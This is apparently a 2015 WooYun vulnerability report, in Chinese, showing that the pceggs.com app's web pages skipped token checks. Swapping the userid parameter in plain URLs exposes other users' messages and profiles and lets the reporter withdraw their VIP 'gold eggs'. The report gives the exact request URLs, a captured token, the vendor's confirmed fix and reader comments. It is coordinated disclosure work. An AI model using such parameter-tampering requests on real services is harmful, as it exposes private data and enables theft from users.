当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094253

漏洞标题:PC蛋蛋token审计不严导致可查阅任意账户信息并可提取任意账户VIP金蛋

相关厂商:pceggs.com

漏洞作者: 路人甲

提交时间:2015-01-27 22:22

修复时间:2015-03-13 22:24

公开时间:2015-03-13 22:24

漏洞类型:网络未授权访问

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-27: 细节已通知厂商并且等待厂商处理中
2015-01-28: 厂商已经确认,细节仅向厂商公开
2015-02-07: 细节向核心白帽子及相关领域专家公开
2015-02-17: 细节向普通白帽子公开
2015-02-27: 细节向实习白帽子公开
2015-03-13: 细节向公众公开

简要描述:

由于PC蛋蛋的App审计不严格而引发的隐私信息泄露。

详细说明:

由于PC蛋蛋的App的Web端对token审计不严格而引发的隐私信息泄露。
0x01 准备工作
硬件:iPhone6、Broadcom 802.11n网卡的iMac
工具:sniffer tools
启用承载网络(虚拟AP):

p1.jpg


下载APP:

ios1.jpg


注册登录:

ios2.jpg


0x02 证明漏洞
sniffer抓一下查看Message的包:

GET /page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=19118867&token=qigqrsrw8r8pa3bbd7coc7qa5s2atpqtql2caec8&keycode=3B33F47EA87C9B19AE2A1E41E75BBF7 HTTP/1.1
Host: app.pceggs.com
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B436
Accept-Language: zh-cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8


地址放到Chrome里访问下:

ios3.jpg


http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=19118867&token=qigqrsrw8r8pa3bbd7coc7qa5s2atpqtql2caec8&keycode=3B33F47EA87C9B19AE2A1E41E75BBF7
发现是可以访问的,那就是token和keycode起到了作用?OK,我们逐个参数去掉测试一下。
去掉keycode参数:

ios4.jpg



http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=19118867&token=qigqrsrw8r8pa3bbd7coc7qa5s2atpqtql2caec8
发现可以访问,那么难道只检查了token?我们把token去掉看看
去掉token参数:

ios5.jpg


http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=19118867
见证奇迹的时刻,居然还可以访问!!难道就没有校验token??赶快换个userid试试!
1003的userid试试:

ios6.jpg


http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=1003
奇迹出现了,居然……

那其他页面存在这种问题吗?赶快看看……
个人中心:

ios7.jpg


http://app.pceggs.com/page/myeggs/app_myeggs.aspx?t=1&v=2.0.6&userid=17789037
无验证token查看VIP金蛋:

ios8.jpg



提取金蛋:

ios10.png


提取金蛋成功:

ios9.png


http://app.pceggs.com/page/myeggs/app_vip.aspx?type=1&t=1&v=2.0.6&userid=17789037
还有其他页面不罗列了,都是同样的问题。

漏洞证明:

ios11.jpg


http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=1004

修复方案:

校验一下token及keycode完整性

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-01-28 17:57

厂商回复:

感谢对PC蛋蛋安全的关注,已修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-27 22:27 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    蛋蛋的悲伤

  2. 2015-01-27 22:30 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    洞主还我蛋蛋

  3. 2015-01-27 22:33 | wifi ( 路人 | Rank:19 漏洞数:2 | 这厮真懒……)

    据说蹦蹦APP也存在校验不严格的问题

  4. 2015-02-18 08:29 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @wifi 蹦蹦客服那个叫啥君的态度很不好……

  5. 2015-03-21 14:06 | wifi ( 路人 | Rank:19 漏洞数:2 | 这厮真懒……)

    @小龙 暴利之下土豪多,土豪一般脾气都不太好

  6. 2015-03-21 19:14 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @wifi 建议你去检测下。。。